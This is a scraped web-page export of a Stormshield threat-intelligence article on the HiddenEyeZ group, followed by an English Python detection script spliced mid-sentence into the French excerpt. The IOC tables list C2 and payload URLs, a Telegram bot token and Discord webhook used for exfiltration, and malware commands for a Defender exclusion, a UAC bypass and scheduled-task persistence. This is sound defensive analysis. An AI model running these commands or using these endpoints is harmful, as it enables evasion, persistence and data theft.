0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">MessengerDiscordtokens.txt<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td 
id=\"td_id_92535347\" rowspan=\"1\" colspan=\"1\" class=\"td_class_92535347\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_92535347\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">StormKitty \/ Prynt Stealer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_4586462\" class=\"desktop-view tr_class_4586462 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_30277754\" rowspan=\"1\" colspan=\"1\" class=\"td_class_30277754\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_30277754\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZlockfile<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_71375034\" rowspan=\"1\" colspan=\"1\" class=\"td_class_71375034\" style=\"padding: 10px; max-width: 200px; min-width: 
200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_71375034\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">StormKitty \/ Prynt Stealer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_4488735\" class=\"desktop-view tr_class_4488735 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_34441429\" rowspan=\"1\" colspan=\"1\" class=\"td_class_34441429\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_34441429\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%rkd.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_73463261\" rowspan=\"1\" colspan=\"1\" class=\"td_class_73463261\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_73463261\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" 
style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1691426\" class=\"desktop-view tr_class_1691426 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_23717580\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23717580\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23717580\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%rk.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_76895514\" rowspan=\"1\" colspan=\"1\" class=\"td_class_76895514\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_76895514\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: 
block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77<\/span><\/div><\/div><\/div><\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">%APPDATA%\\r77-x64.dll<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">r77<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">%APPDATA%\\r77-x86.dll<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">r77<\/td><\/tr>
<\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>URL\/IP<\/h3>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_15\"\n     id='ninja_table_builder_414263'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_15\"\n     style=\"\n     max-height:800px;\n     max-width: 800px;margin-right: auto;\">\n    <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414263\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><tbody class=\"tbody\">
<tr><th style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">Address<\/th><th style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">Sample<\/th><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">5[.]75.162.22<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">HiddenEyeZ HVNC<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">hxxp:\/\/hiddeneyez.com\/icar\/<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">HiddenEyeZ HVNC<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">hxxps:\/\/api.telegram.org\/bot5905672828:AAGUnoGz8ijN7mSXpHHKho9sOEnmiUyuoC0\/<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">StormKitty \/ Prynt Stealer<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">hxxp:\/\/193.31.116.239\/crypt\/public\/Update_Downloads\/patata.jpg<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">HiddenEyeZ HVNC Dropper<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">hxxps:\/\/raw.githubusercontent.com\/HiddenEyeZ\/tg\/main\/rt.jpg<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">HiddenEyeZ HVNC Dropper<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">hxxps:\/\/i.ibb.co\/kDLd65M\/dcicon.png<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">Icarus<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">hxxps:\/\/i.ibb.co\/RvwvG2z\/icaruwsdr-athens.png<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">Icarus<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">hxxps:\/\/discord.com\/api\/webhooks\/995609071304593409\/IOLhP3ykqEdZcTv7nJgfKJfoNaRwLOZX3dgmUFTXow93vFkbG4e9gVYaDjfaHkGc3x6M<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">Icarus<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">208[.]95.113.1<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">Icarus<\/td><\/tr>
<\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Commands<\/h3>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_16\"\n     id='ninja_table_builder_414262'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_16\"\n     style=\"\n     max-height:800px;\n     max-width: 800px;margin-right: auto;\">\n    <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414262\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><tbody class=\"tbody\">
<tr><th style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">Command<\/th><th style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">Sample<\/th><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">cvtres.exe HiddenEyeZ_Client 5.75.162.221 8081 mPgxExkLE<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">HiddenEyeZ HVNC Dropper<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">cmd \/k start \/b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">HiddenEyeZ HVNC Dropper<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">cmd.exe \/c start computerdefaults.exe<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">HiddenEyeZ HVNC Dropper (r77 install \/ uninstall)<\/td><\/tr>
<tr><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">cmd \/c schtasks \/create \/f \/sc onlogon \/rl highest \/tn \"proclog\" \/tr [...]<\/td><td style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\">HiddenEyeZ HVNC<\/td><\/tr>
<\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_column_text]Au cours de la r\u00e9cente analyse d&rsquo;une campagne de distribution de stealers RedLine, l&rsquo;\u00e9quipe de Cyber Threat Intelligence de Stormshield (Stormshield Customer Security Lab, SCSL) a mis la main sur des samples de malwares provenant d&rsquo;un groupe 
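The URL/IP and Commands tables above list the indicators as raw strings. The script below is an added example written for this article, not code from Stormshield or from the HiddenEyeZ tooling, and turns them into something a SOC can run: it refangs the defanged URLs and IPs and matches them against proxy records, and it encodes the four observed command lines as behavioural rules (a Defender exclusion added through `Add-MpPreference`, `computerdefaults.exe` spawned by `cmd.exe`, a logon-triggered scheduled task at the highest run level, and a process named `cvtres.exe` carrying an `<ip> <port>` argument pair) over process-creation events. The event field names `Image`, `ParentImage` and `CommandLine` follow Sysmon event ID 1 and are an assumption to map onto your own SIEM schema; the events and proxy records are constructed for the example, including the RFC 5737 addresses and the `/tr` target of the scheduled task, which the article truncates.

```python
"""Detection helpers built from the HiddenEyeZ IOC tables above.

Added example, not Stormshield's or HiddenEyeZ's code. Event and proxy records
are constructed; the Sysmon event ID 1 field names are an assumption to adapt
to your own SIEM schema.
"""
import re

# Network indicators, defanged exactly as in the URL/IP table, mapped to their sample.
NETWORK_IOCS = {
    "5[.]75.162.22": "HiddenEyeZ HVNC",
    "hxxp://hiddeneyez.com/icar/": "HiddenEyeZ HVNC",
    "hxxps://api.telegram.org/bot5905672828:AAGUnoGz8ijN7mSXpHHKho9sOEnmiUyuoC0/": "StormKitty / Prynt Stealer",
    "hxxp://193.31.116.239/crypt/public/Update_Downloads/patata.jpg": "HiddenEyeZ HVNC Dropper",
    "hxxps://raw.githubusercontent.com/HiddenEyeZ/tg/main/rt.jpg": "HiddenEyeZ HVNC Dropper",
    "hxxps://i.ibb.co/kDLd65M/dcicon.png": "Icarus",
    "hxxps://i.ibb.co/RvwvG2z/icaruwsdr-athens.png": "Icarus",
    "hxxps://discord.com/api/webhooks/995609071304593409/IOLhP3ykqEdZcTv7nJgfKJfoNaRwLOZX3dgmUFTXow93vFkbG4e9gVYaDjfaHkGc3x6M": "Icarus",
    "208[.]95.113.1": "Icarus",
}

def refang(ioc: str) -> str:
    """Reverse the article's defanging (hxxp -> http, [.] -> .) so it compares with live logs."""
    return re.sub(r"^hxxp", "http", ioc).replace("[.]", ".")

def match_network(dst_ip: str, url: str) -> list[str]:
    """Samples whose indicator matches one connection. URL indicators are prefix-matched
    (in traffic the Telegram bot and Discord webhook paths are followed by a method name);
    bare IP indicators are compared with the destination address only."""
    hits = []
    for ioc, sample in NETWORK_IOCS.items():
        plain = refang(ioc)
        if plain.startswith("http"):
            if url.startswith(plain):
                hits.append(sample)
        elif dst_ip == plain:
            hits.append(sample)
    return hits

# A dotted quad followed by a port: the argument shape of the HVNC client command line.
IPV4_PORT = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\s+\d{1,5}\b")

# Behavioural rules derived from the Commands table: (name, predicate on a process event).
PROCESS_RULES = [
    # The dropper whitelists its payload in Defender before dropping it.
    ("defender_exclusion_added",
     lambda e: re.search(r"Add-MpPreference\s+-ExclusionPath", e["CommandLine"], re.I) is not None),
    # computerdefaults.exe is an auto-elevating system binary; cmd.exe launching it
    # is the step that gives the r77 install/uninstall an elevated context.
    ("computerdefaults_from_cmd",
     lambda e: e["ParentImage"].lower().endswith("\\cmd.exe")
     and e["Image"].lower().endswith("\\computerdefaults.exe")),
    # Logon-triggered task at the highest run level: the HVNC persistence.
    ("schtasks_onlogon_highest",
     lambda e: re.search(r"schtasks\s+/create.*/sc\s+onlogon.*/rl\s+highest", e["CommandLine"], re.I) is not None),
    # The genuine resource converter cvtres.exe never takes an <ip> <port> argument pair.
    ("cvtres_with_c2_args",
     lambda e: e["Image"].lower().endswith("\\cvtres.exe") and IPV4_PORT.search(e["CommandLine"]) is not None),
]

def scan_processes(events: list[dict]) -> list[tuple[str, str]]:
    """(rule name, command line) for every rule each event triggers, in event order."""
    return [(name, e["CommandLine"]) for e in events for name, pred in PROCESS_RULES if pred(e)]

def scan_connections(connections: list[tuple[str, str]]) -> list[tuple[str, str]]:
    """(sample, url) for every proxy record that matches a network indicator."""
    return [(sample, url) for dst_ip, url in connections for sample in match_network(dst_ip, url)]

# Constructed Sysmon-style events: the four command lines from the table plus one benign
# cvtres.exe run by the .NET compiler, which must not fire. The /tr target is invented;
# the article truncates it.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Users\u\AppData\Local\Temp\setup.exe",
     "CommandLine": "cmd /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe"},
    {"Image": r"C:\Windows\System32\computerdefaults.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "computerdefaults.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Users\u\AppData\Roaming\cvtres.exe",
     "CommandLine": 'cmd /c schtasks /create /f /sc onlogon /rl highest /tn "proclog" /tr "C:\\Users\\u\\AppData\\Roaming\\payload.exe"'},
    {"Image": r"C:\Users\u\AppData\Roaming\cvtres.exe", "ParentImage": r"C:\Users\u\AppData\Local\Temp\setup.exe",
     "CommandLine": "cvtres.exe HiddenEyeZ_Client 5.75.162.221 8081 mPgxExkLE"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": 'cvtres.exe /NOLOGO /READONLY /MACHINE:x64 "/OUT:C:\\Users\\u\\AppData\\Local\\Temp\\RES1A2B.tmp"'},
]

# Constructed proxy records (destination IP, URL as seen with TLS inspection); RFC 5737 addresses.
SAMPLE_CONNECTIONS = [
    ("203.0.113.10", "https://api.telegram.org/bot5905672828:AAGUnoGz8ijN7mSXpHHKho9sOEnmiUyuoC0/sendDocument"),
    ("208.95.113.1", "http://208.95.113.1/"),
    ("203.0.113.11", "https://raw.githubusercontent.com/HiddenEyeZ/tg/main/rt.jpg"),
    ("198.51.100.5", "https://www.example.com/"),
]

if __name__ == "__main__":
    for finding in scan_processes(SAMPLE_EVENTS) + scan_connections(SAMPLE_CONNECTIONS):
        print(*finding, sep="\t")
```

Two caveats before deploying rules like these. The Telegram bot token and the Discord webhook identifier sit in the URL path, so they are only visible in proxy logs when TLS is inspected (or in endpoint telemetry); without inspection only the hostnames `api.telegram.org` and `discord.com` can be seen, and both are legitimate services that should not be blocked on that basis alone. Also, the address in the URL/IP table (5[.]75.162.22) and the one in the `cvtres.exe` command line (5.75.162.221) differ in their last octet; the matcher compares exact addresses, so confirm against the sample which value is correct before adding either to a blocklist.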
cyber-criminel,&#8230;<\/p>\n","protected":false},"author":83,"featured_media":414031,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[7065],"tags":[4368],"business_size":[],"industry":[],"help_mefind":[],"features":[],"type_security":[],"maintenance":[],"offer":[],"administration_tools":[],"cloud_offers":[],"listing_product":[],"class_list":["post-414036","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technical-posts-fr","tag-la-cybersecurite-par-stormshield"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>HiddenEyeZ : carte d\u2019identit\u00e9 du groupe cybercriminel | Stormshield<\/title>\n<meta name=\"description\" content=\"Apr\u00e8s l\u2019analyse sur la campagne RedLine, compl\u00e9ment d\u2019enqu\u00eate sur la cybercriminalit\u00e9 et le groupe HiddenEyeZ.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HiddenEyeZ : carte d\u2019identit\u00e9 du groupe cybercriminel | Stormshield\" \/>\n<meta property=\"og:description\" content=\"Apr\u00e8s l\u2019analyse sur la campagne RedLine, compl\u00e9ment d\u2019enqu\u00eate sur la cybercriminalit\u00e9 et le groupe HiddenEyeZ.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\" \/>\n<meta property=\"og:site_name\" content=\"Stormshield\" \/>\n<meta property=\"article:published_time\" content=\"2023-05-25T14:00:23+00:00\" 
\/>\n<meta property=\"article:modified_time\" content=\"2024-01-30T14:43:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"1000\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Stormshield Customer Security Lab\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:site\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Stormshield Customer Security Lab\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"31 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\"},\"author\":{\"name\":\"Stormshield Customer Security Lab\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249\"},\"headline\":\"Groupe cybercriminel HiddenEyeZ : carte 
d\u2019identit\u00e9\",\"datePublished\":\"2023-05-25T14:00:23+00:00\",\"dateModified\":\"2024-01-30T14:43:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\"},\"wordCount\":9897,\"commentCount\":0,\"image\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg\",\"keywords\":[\"La cybers\u00e9curit\u00e9 - par Stormshield\"],\"articleSection\":[\"Billets techniques\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\",\"url\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\",\"name\":\"HiddenEyeZ : carte d\u2019identit\u00e9 du groupe cybercriminel | Stormshield\",\"isPartOf\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg\",\"datePublished\":\"2023-05-25T14:00:23+00:00\",\"dateModified\":\"2024-01-30T14:43:04+00:00\",\"author\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249\"},\"description\":\"Apr\u00e8s l\u2019analyse sur la campagne RedLine, compl\u00e9ment d\u2019enqu\u00eate sur la cybercriminalit\u00e9 et le groupe 
HiddenEyeZ.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage\",\"url\":\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg\",\"contentUrl\":\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg\",\"width\":1000,\"height\":1000},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.stormshield.com\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Groupe cybercriminel HiddenEyeZ : carte d\u2019identit\u00e9\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/#website\",\"url\":\"https:\/\/www.stormshield.com\/fr\/\",\"name\":\"Stormshield\",\"description\":\"Stormshield\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.stormshield.com\/fr\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249\",\"name\":\"Stormshield Customer Security 
